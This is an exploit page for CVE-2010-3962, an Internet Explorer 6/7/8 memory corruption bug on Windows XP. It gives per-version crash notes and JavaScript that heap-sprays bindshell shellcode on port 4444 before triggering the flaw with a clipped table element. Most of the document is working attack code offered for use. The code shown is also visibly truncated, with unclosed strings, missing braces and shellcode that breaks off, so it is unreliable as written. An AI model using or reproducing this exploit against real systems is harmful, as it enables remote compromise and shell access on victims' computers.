Microsoft Internet Explorer 6/7/8 - Memory Corruption











# Internet Explorer Memory Corruption 0day Vulnerability CVE-2010-3962
# Tested on Windows XP SP3 IE6 IE7 IE8
# Coded by Matteo Memelli ryujin __at__
# Thx to dookie __at__
# notes	: This is a quick and dirty exploit! No DEP/ASLR bypass here feel free to improve it 

<!-- Tested on IE6/IE7/IE8 XPSP3 quick and dirty sploit for CVE-2010-3962 zeroday

Note: The EIP value at crash time is not controllable and depends on the exact version of the mshtml library used by IE; this means that the exploit is not universal for the IE versions indicated hereunder. 
A huge spray will probably be more successful on different versions of mshtml but will definetly slow down the exploitation. 

IE6 on XP SP2: mshtml.dll Version 6.0.2900.5512 EIP: 0x0D7DC9C9
IE6 on XP SP3: mshtml.dll Version 6.00.2900.6036 Patched 06Nov10 EIP: 0x0E7DC9CD
IE7 on XP SP3: mshtml.dll Version 7.00.6000.17080 EIP: 0x303CEEBB
IE8 on XP SP3: mshtml.dll Version 8.00.6001.18939 EIP: 0x1D3CF5BD
IE8 on XP SP3 Patched 06Nov10: mshtml.dll Version 8.00.6001.18975 EIP: 0x4D3CF5BF

Matteo Memelli, ryujin __at__ thx to dookie __at__ //-->

<head><title>poc CVE-2010-3962 zeroday</title>
function alloc(bytes, mystr) {
// Bindshell on port 4444
var shellcode = unescape('%u9090%u9090%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b'+
while (mystr.length< bytes) mystr += mystr;
return mystr.substr(0, (bytes-6)/2) + shellcode;
alert('ph33r: click me');
var evil = new Array();
var FAKEOBJ = unescape("%u0d0d%u0d0d");
//FAKEOBJ = alloc(233120, FAKEOBJ); // IE6 mshtml.dll Version 6.0.2900.5512
//FAKEOBJ = alloc(241748, FAKEOBJ); // IE6 mshtml.dll Version 6.00.2900.6036 
//FAKEOBJ = alloc(733120, FAKEOBJ); // IE7 mshtml.dll Version 7.00.6000.17080
//FAKEOBJ = alloc(433120, FAKEOBJ); // IE8 mshtml.dll Version 8.00.6001.18939
FAKEOBJ = alloc(1294464, FAKEOBJ); // IE8 mshtml.dll Version 8.00.6001.18975
//FAKEOBJ = alloc(1550371, FAKEOBJ); // oy oy oy huge spray! 

for (var k = 0; k < 1000; k++) {
    evil[k] = FAKEOBJ.substr(0, FAKEOBJ.length);
document.write("<table style=position:absolute;clip:rect(0)>");